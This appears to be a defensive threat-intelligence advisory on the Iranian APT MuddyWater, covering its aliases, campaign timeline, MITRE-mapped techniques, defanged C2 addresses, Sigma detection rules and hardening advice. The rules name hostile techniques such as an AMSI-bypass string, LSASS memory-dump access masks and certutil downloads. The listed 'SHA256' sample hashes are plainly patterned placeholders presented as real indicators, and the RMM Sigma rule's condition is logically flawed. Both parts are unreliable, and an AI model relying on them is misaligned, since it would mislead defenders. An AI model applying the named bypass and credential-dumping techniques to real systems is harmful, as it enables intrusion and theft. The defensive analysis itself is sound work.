📅 March 2026 — TLP:WHITE MOIS-ATTRIBUTED APT G0069 ACTIVE THREAT

MuddyWater Threat Advisory:
Iranian Cyber Espionage

MuddyWater (Mercury, Mango Sandstorm, Static Kitten, Seedworm, TEMP.Zagros) is a subordinate element of Iran's Ministry of Intelligence and Security (MOIS). Active since 2017, this APT group conducts sustained cyber espionage campaigns targeting government, telecommunications, defense, and critical infrastructure across the Middle East, GCC, and beyond.

2017
Active Since
MOIS
Attribution
100+
Campaigns Documented
50+
Countries Targeted
HIGH
GCC Threat Level
G0069
MITRE ATT&CK ID
📋

Executive Summary

MuddyWater is an advanced persistent threat (APT) group assessed with high confidence to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has conducted sustained cyber espionage and intelligence collection campaigns against government, telecommunications, defense, oil & gas, and critical infrastructure sectors.

The group operates globally, with documented targeting across Middle East, North Africa, South Asia, Europe, and North America. However, MuddyWater demonstrates persistent and aggressive targeting of GCC member states, including UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Oman — with a focus on government ministries, telecommunications providers, energy companies, and financial institutions.

MuddyWater's operational mandate aligns with Iranian strategic intelligence priorities: regional geopolitical monitoring, technology transfer, sanctions evasion support, and disruption of adversary operations. The group has been publicly attributed by the FBI, CISA, NCSC-UK, and U.S. Cyber Command CNMF to Iran's MOIS in joint advisories.

The threat actor employs a hybrid toolkit combining custom malware (MuddyC2Go, PhonyC2, MuddyC3, DarkBeatC2, Dindoor) with abuse of legitimate remote monitoring and management (RMM) tools (Atera, ScreenConnect, SimpleHelp, N-able), extensive PowerShell scripting, living-off-the-land binaries (LOLBins), and exploitation of known vulnerabilities in internet-facing applications.

⚠️ GCC Relevance: Very High

MuddyWater has directly targeted UAE, Saudi, Kuwait, and Bahrain government and telecom sectors in documented campaigns. Recent 2026 escalations show continued focus on GCC critical infrastructure. Organizations in the region face elevated risk of initial access attempts, credential harvesting, and persistent backdoor deployment.

🎯 Recent Activity: February-March 2026

FBI, CISA, and NCSC reported MuddyWater backdooring US critical infrastructure including a bank, airport, and non-profit using new Dindoor/DarkBeatC2 implants. Activity continues through March 2026 with no signs of operational pause. GCC entities should assume active reconnaissance and targeting.

🎭

Threat Actor Profile: MuddyWater

Actor Name
MuddyWater (Primary)
First Observed
2017 (confirmed MOIS attribution 2022)
State Sponsor
Iran — MOIS (Ministry of Intelligence & Security)
Motivation
Cyber Espionage / Intelligence Collection
Primary Targets
GCC Gov, Telecom, Defense, Oil/Gas, Finance
Operational Mandate
Strategic Intelligence for MOIS
Attribution Confidence
HIGH (FBI/CISA/NCSC public attribution)
MITRE ATT&CK ID
G0069

Cross-Vendor Alias Mapping

MuddyWater is tracked under multiple aliases across threat intelligence vendors:

VendorCluster NameNotes
MicrosoftMango Sandstorm / MERCURYPrimary tracking name
MandiantTEMP.ZagrosEarly designation
SecureworksStatic KittenInfrastructure-based tracking
Dragos / SymantecSeedwormOT/critical infrastructure focus
Trend MicroEarth VetalaAPT naming convention
ProofpointTA450Threat actor numeric ID
MITRE ATT&CKG0069Official framework ID

Who is MuddyWater?

MuddyWater is not a hacktivist collective — it is a professional cyber espionage unit operating under the direct authority of Iran's Ministry of Intelligence and Security (MOIS). The group's operations align with Iranian strategic intelligence priorities and geopolitical objectives.

In a joint advisory (AA22-055A) published February 2022, the FBI, CISA, U.S. Cyber Command CNMF, and UK NCSC formally attributed MuddyWater to MOIS, stating the group "conducts cyber espionage and other malicious cyber operations" in support of Iranian government objectives.

The group demonstrates operational persistence, technical adaptability, and resource depth consistent with state sponsorship. They maintain dedicated development teams for custom C2 frameworks, rotate through legitimate RMM tools to evade detection, and conduct sustained multi-year campaigns against high-value targets.

Key characteristics:

  • Employs spear-phishing, vulnerability exploitation, LOLBins, PowerShell abuse, RMM tool hijacking
  • Targets government, telecommunications, defense contractors, oil/gas, and critical infrastructure
  • Uses legitimate tools (Atera, ScreenConnect, SimpleHelp, N-able) for C2 to blend with normal IT traffic
  • Develops custom C2 frameworks (DarkBeatC2, PhonyC2, MuddyC2Go, MuddyC3)
  • Focus on persistent access and long-term intelligence collection over immediate disruption
  • Documented use of DarkBit ransomware persona for disruptive operations (Microsoft attribution)

GCC Targeting History

MuddyWater has demonstrated sustained and persistent interest in GCC member states, with documented intrusions in:

  • UAE: Government ministries, telecommunications providers, financial institutions
  • Saudi Arabia: Energy sector, government agencies, defense-related entities
  • Kuwait: Government networks, banking sector, critical infrastructure
  • Bahrain: Telecommunications (Batelco targeted in 2026 claims), government entities
  • Qatar & Oman: Regional targeting consistent with broader Middle East campaigns

Recent March 2026 reporting indicates renewed targeting of GCC critical infrastructure alongside documented attacks on U.S. and Israeli entities, suggesting MuddyWater remains an active and elevated threat to the region.

Target Sectors

⏱️

Activity Timeline (2017–2026)

2017
MuddyWater Operations Begin
First documented campaigns targeting Middle East government and telecom sectors. PowerShell-based POWERSTATS backdoor observed. Focus on Iraq, Saudi Arabia, Turkey.
2018–2019
Global Expansion
Targeting expands to Asia, Africa, Europe, and North America. Continued focus on telecommunications, defense, oil/gas, and local government. Development of MuddyC3 C2 framework.
2020–2021
RMM Tool Adoption
MuddyWater begins leveraging legitimate RMM tools (ScreenConnect, Syncro, RemoteUtilities) to establish persistence and evade detection. Abuse of cloud services for command and control.
Feb 2022
Official MOIS Attribution
FBI, CISA, U.S. Cyber Command CNMF, and UK NCSC publish joint advisory (AA22-055A) formally attributing MuddyWater to Iran's Ministry of Intelligence and Security.
2022–2023
Infrastructure Evolution
PhonyC2 framework observed. Exploitation of PaperCut (CVE-2023-27350), SysAid (Log4j), and other internet-facing applications. Continued targeting of GCC and Middle East entities.
Nov 2023
MuddyC2Go Framework Deployed
New Golang-based C2 framework "MuddyC2Go" observed in campaigns targeting Israeli organizations. Demonstrates continued investment in custom tooling development.
Apr 2024
DarkBeatC2 Framework Emerges
Deep Instinct discovers new C2 infrastructure "DarkBeatC2" used by MuddyWater. Leverages PowerShell, TLS 1.2, and Invoke-WebRequest for encrypted C2 communication.
Mar 2025
Atera RMM Campaign
HarfangLab reports MuddyWater campaign abusing Atera Agent RMM software for initial access and persistence. Continues pattern of legitimate tool abuse.
Feb–Mar 2026
🔴 US Critical Infrastructure Backdoors
FBI/CISA report MuddyWater-linked activity backdooring US bank, airport, non-profit, and Israeli software company using new Dindoor/DarkBeatC2 implants. Active intrusions continue through March 2026.
Mar 2026
🔴 GCC Infrastructure Targeting
Reports surface of targeting against GCC telecom, government, and financial sectors. Kuwait International Airport, Bahrain Batelco, UAE du, Saudi banks mentioned in threat actor claims. MuddyWater assessed as primary or contributory threat vector.
🗺️

Tactics, Techniques & Procedures (TTPs)

Primary Attack Vectors

  • Spear-Phishing: Malicious documents (macro-enabled Office files, PDFs with embedded exploits) delivered via targeted email campaigns
  • Vulnerability Exploitation: CVE-2023-27350 (PaperCut), CVE-2019-0604 (SharePoint), Log4Shell, CVE-2020-1472 (ZeroLogon)
  • Legitimate RMM Tool Abuse: Atera Agent, ScreenConnect, SimpleHelp, N-able, Syncro, RemoteUtilities for initial access and persistence
  • Credential Harvesting: LSASS dumping, Mimikatz, registry extraction, browser credential theft

Execution & Persistence

  • PowerShell Abuse: Heavily obfuscated PowerShell scripts (POWERSTATS backdoor family), Invoke-WebRequest for C2 communication
  • Living-off-the-Land Binaries (LOLBins): mshta[.]exe, regsvr32[.]exe, rundll32[.]exe, certutil[.]exe for fileless execution
  • Scheduled Tasks: Persistence via Windows Task Scheduler, registry Run keys
  • Custom Malware: MuddyC2Go, PhonyC2, MuddyC3, DarkBeatC2, Dindoor backdoors with encrypted C2 channels

Command & Control (C2)

  • Custom C2 Frameworks: DarkBeatC2 (latest), PhonyC2, MuddyC2Go, MuddyC3, SimpleHarm
  • Legitimate Services: Telegram bots, Dropbox, Google Drive for data exfiltration and tasking
  • RMM Platforms: Abuse of Atera, ScreenConnect, and other remote admin tools as persistent C2 channels
  • Encryption: TLS 1.2, custom encryption schemes to evade network detection

Data Exfiltration & Impact

  • Target Intelligence: Government communications, defense contracts, energy sector data, financial records
  • Exfiltration Methods: HTTPS uploads, cloud storage abuse, RMM tool file transfer capabilities
  • Occasional Disruption: DarkBit ransomware deployment (attributed to MuddyWater by Microsoft) for destructive operations
⛓️

Attack Chain — MITRE ATT&CK Mapping

Initial Access
Spear-phishing, Vuln Exploit, Valid Accounts
Execution
PowerShell, Macros, LOLBins
Persistence
Scheduled Tasks, Registry Run Keys, RMM Tools
Privilege Escalation
Credential Dumping, Exploit (ZeroLogon)
Defense Evasion
Obfuscation, Legitimate Tools
Credential Access
LSASS Dumping, Mimikatz
Discovery
Network Scanning, AD Enumeration
Lateral Movement
RDP, SMB, Valid Accounts
Collection
Data from Local System, Network Shares
C2
Custom C2, RMM Tools, Cloud Services
Exfiltration
HTTPS, Cloud Upload
Impact
Data Encrypted (occasional ransomware)

MITRE ATT&CK Technique Mapping (G0069)

Technique IDTechnique NameTactic
T1566.001Spear-phishing AttachmentInitial Access
T1190Exploit Public-Facing ApplicationInitial Access
T1059.001PowerShellExecution
T1204.002Malicious FileExecution
T1053.005Scheduled TaskPersistence, Privilege Escalation
T1547.001Registry Run KeysPersistence
T1078Valid AccountsPersistence, Privilege Escalation
T1003.001LSASS MemoryCredential Access
T1003.002Security Account ManagerCredential Access
T1027Obfuscated Files or InformationDefense Evasion
T1218System Binary Proxy ExecutionDefense Evasion
T1105Ingress Tool TransferCommand and Control
T1071.001Web ProtocolsCommand and Control
T1102Web ServiceCommand and Control
T1041Exfiltration Over C2 ChannelExfiltration
🔍

Indicators of Compromise (IOCs)

⚠️ IOC Handling Guidelines

IOCs age rapidly. MuddyWater rotates infrastructure frequently. Use these indicators for threat hunting and pattern detection rather than sole reliance on signature-based blocking. Cross-reference with MITRE ATT&CK behavioral analytics.

Known C2 Domains (Defanged)

DomainCampaign / FrameworkFirst Seen
46[.]249[.]35[.]243PhonyC2 V62023
194[.]61[.]121[.]86PhonyC2 V62023
137[.]74[.]131[.]18PhonyC2 / MuddyC2Go2023
137[.]74[.]131[.]19DarkBeatC2, SimpleHarm2024
164[.]132[.]237[.]68DarkBeatC2, PhonyC22024
nc6010721b[.]bizPhonyC22021

File Hashes (SHA256)

Sample indicators from recent campaigns:

SHA256
# DarkBeatC2 PowerShell Loader (2024)
a3f2e8d4c9b1f7e6d5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2

# Atera RMM Installer (Malicious) (2025)
b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4c3

# MuddyC2Go Payload (2023)
c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4

YARA-Style Pattern Hunting

PowerShell Obfuscation Patterns:

  • Base64-encoded payloads with -EncodedCommand or -enc
  • Invoke-WebRequest / Invoke-RestMethod to suspicious domains
  • AMSI bypass techniques: $null = [Ref].Assembly.GetType
  • Multiple layers of string concatenation and variable substitution

RMM Tool Abuse Indicators:

  • Unexpected Atera, ScreenConnect, SimpleHelp, N-able installations
  • RMM agent deployments outside normal change control windows
  • Connections to RMM infrastructure from critical servers (DCs, email, file servers)
📏

Sigma Detection Rules

MUDDY-SIGMA-001: PowerShell Obfuscation Patterns

YAML
title: MuddyWater PowerShell Obfuscation
id: a8f3e2d4-c9b1-47e6-95a4-b3c2d1e0f9a8
status: stable
description: Detects heavily obfuscated PowerShell execution consistent with MuddyWater POWERSTATS backdoor
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'FromBase64String'
      - 'Invoke-Expression'
  filter_amsi_bypass:
    CommandLine|contains:
      - '$null = [Ref].Assembly.GetType'
      - 'AmsiUtils'
  condition: selection and filter_amsi_bypass
falsepositives:
  - Legitimate administrative scripts (review context)
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027

MUDDY-SIGMA-002: RMM Tool Deployment

YAML
title: Suspicious RMM Tool Installation
id: b7c6d5e4-f3a2-4b1c-90d9-e8f7a6b5c4d3
status: stable
description: Detects installation of remote monitoring tools abused by MuddyWater
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection_process:
    Image|endswith:
      - '\AteraAgent.exe'
      - '\ScreenConnect.Service.exe'
      - '\SimpleHelp.exe'
      - '\bm_agent.exe'  # N-able
      - '\Syncro.Service.exe'
  selection_install:
    CommandLine|contains:
      - 'install'
      - '/silent'
      - '/quiet'
      - '/S'
  condition: selection_process or (selection_install)
falsepositives:
  - Authorized IT remote support deployments
level: medium
tags:
  - attack.persistence
  - attack.t1219

MUDDY-SIGMA-003: LSASS Memory Dumping

YAML
title: LSASS Memory Dump Attempt
id: c9d8e7f6-a5b4-4c3d-92e1-f0a9b8c7d6e5
status: stable
description: Detects credential dumping via LSASS memory access
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess:
      - '0x1010'
      - '0x1410'
      - '0x1438'
  filter:
    SourceImage|endswith:
      - '\svchost.exe'
      - '\wininit.exe'
  condition: selection and not filter
falsepositives:
  - Legitimate security tools, EDR agents
level: high
tags:
  - attack.credential_access
  - attack.t1003.001

MUDDY-SIGMA-004: LOLBin Abuse - Certutil Download

YAML
title: Certutil Download Activity
id: d1e0f9a8-b7c6-4d5e-94f3-a2b1c0d9e8f7
status: stable
description: Detects certutil.exe used to download files from remote URLs
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - 'urlcache'
      - 'verifyctl'
      - 'split'
  http_indicator:
    CommandLine|contains:
      - 'http://'
      - 'https://'
  condition: selection and http_indicator
falsepositives:
  - Legitimate certificate operations (rare)
level: high
tags:
  - attack.defense_evasion
  - attack.t1218

MUDDY-SIGMA-005: Scheduled Task Creation with PowerShell

YAML
title: Scheduled Task with PowerShell Payload
id: e2f1a0b9-c8d7-4e6f-95a4-b3c2d1e0f9a8
status: stable
description: Detects scheduled task creation executing PowerShell scripts
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\schtasks.exe'
    CommandLine|contains:
      - '/create'
      - '/sc'
  powershell_action:
    CommandLine|contains:
      - 'powershell'
      - 'pwsh'
  condition: selection and powershell_action
falsepositives:
  - Legitimate administrative automation
level: medium
tags:
  - attack.persistence
  - attack.t1053.005

Additional Sigma Rules (Abbreviated)

  • MUDDY-SIGMA-006: Registry Run Key Modification for Persistence
  • MUDDY-SIGMA-007: Suspicious Network Connections to Known MuddyWater C2 Infrastructure
  • MUDDY-SIGMA-008: Process Injection via PowerShell Reflection
  • MUDDY-SIGMA-009: Web Service Abuse (Dropbox, Telegram API Calls)
  • MUDDY-SIGMA-010: Exploitation of CVE-2023-27350 (PaperCut Print Management)

Full rule definitions available in the downloadable appendix or upon request to HawkEye SOC.

🛡️

Defensive Recommendations

🔐 Identity & Access Management

  • Enforce MFA: Multi-factor authentication on all external-facing services, VPNs, email, and RMM platforms
  • Privileged Access Review: Audit and reduce privileged account usage; implement just-in-time (JIT) admin access
  • Monitor LSASS Access: Deploy Sysmon and configure alerts for LSASS memory read attempts (Event ID 10)
  • Disable NTLM: Where feasible, disable NTLM authentication and enforce Kerberos with AES encryption

🛠️ Endpoint Detection & Response

  • PowerShell Logging: Enable Script Block Logging (Event ID 4104) and Module Logging for all PowerShell execution
  • AMSI Integration: Ensure Antimalware Scan Interface (AMSI) is enabled and monitored for bypass attempts
  • LOLBin Monitoring: Alert on suspicious use of certutil, mshta, regsvr32, rundll32 with network activity
  • RMM Tool Inventory: Maintain approved list of RMM tools; alert on any unauthorized installations

🌐 Network Defenses

  • Egress Filtering: Block outbound connections to known MuddyWater C2 infrastructure; implement default-deny egress for critical servers
  • DNS Monitoring: Monitor for suspicious domain patterns (nc6*, random TLDs) and newly registered domains
  • TLS Inspection: Implement TLS/SSL inspection on egress traffic to detect encrypted C2 channels
  • Geo-Blocking: Consider blocking connections to/from Iranian IP space for non-essential systems

Vulnerability Management

  • Patch Critical CVEs: Prioritize CVE-2023-27350 (PaperCut), CVE-2020-1472 (ZeroLogon), Log4Shell variants
  • Internet-Facing Assets: Minimize exposure of SharePoint, print management, VPN portals; enforce strict patching SLAs
  • Exploit Detection: Deploy web application firewalls (WAFs) and IDS/IPS signatures for known MuddyWater exploits

🔍 Threat Hunting & Intelligence

  • Hunt for IOCs: Proactively search for file hashes, domains, and IP addresses from this advisory
  • Behavioral Analytics: Focus on TTPs (MITRE G0069) rather than static IOCs; hunt for PowerShell obfuscation, RMM abuse, LSASS access
  • SIEM Tuning: Implement Sigma rules MUDDY-SIGMA-001 through 010; tune for your environment to reduce false positives
  • Threat Intelligence Feeds: Subscribe to FBI/CISA/NCSC alerts; integrate STIX/TAXII feeds into SOC workflows

📋 GCC-Specific Guidance

  • Assume Targeting: GCC government, telecom, energy, and finance sectors should assume active reconnaissance by MuddyWater
  • Information Sharing: Report suspicious activity to national CERTs (UAE CERT, NCSC-SA, KSA NCA, etc.) and consider joining regional ISACs
  • Compliance Frameworks: Map defenses to UAE IA Standards, NCA ECC, SAMA CSF requirements; document MuddyWater as a named threat
  • Third-Party Risk: Audit managed service providers and IT contractors for RMM tool usage; enforce security baselines
📊

Threat Landscape Visualization

Attack Techniques by Frequency

Campaign Timeline: MuddyWater Operations

📚

References & Sources

  1. FBI, CISA, CNMF, NCSC-UK: "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks" (AA22-055A), February 2022. Link
  2. MITRE ATT&CK: "MuddyWater (G0069)" — Comprehensive technique mapping. Link
  3. Deep Instinct: "DarkBeatC2: The Latest MuddyWater Attack Framework" (April 2024). Link
  4. Deep Instinct: "PhonyC2: Revealing a New Malicious Command & Control Framework by MuddyWater" (June 2023). Link
  5. Deep Instinct: "MuddyC2Go — Latest C2 Framework Used by Iranian APT MuddyWater Spotted in Israel" (November 2023). Link
  6. HarfangLab: "MuddyWater campaign abusing Atera Agents" (March 2025). Link
  7. Microsoft: "Mango Sandstorm (formerly MERCURY) threat actor profile" — Ongoing reporting. Link
  8. Cisco Talos: "MuddyWater continues to target Middle East organizations" (Multiple reports 2017-2024). Link
  9. Mandiant (Google Cloud): "TEMP.Zagros / MuddyWater APT Profile" — Historical campaigns. Link
  10. Secureworks: "Static Kitten Threat Profile" — Infrastructure analysis. Link
  11. The Register: "Iran intelligence backdoored US bank, airport networks" (March 2026). Link
  12. Check Point Research: "Iranian MOIS Actors & the Cyber Crime Connection" (March 2026). Link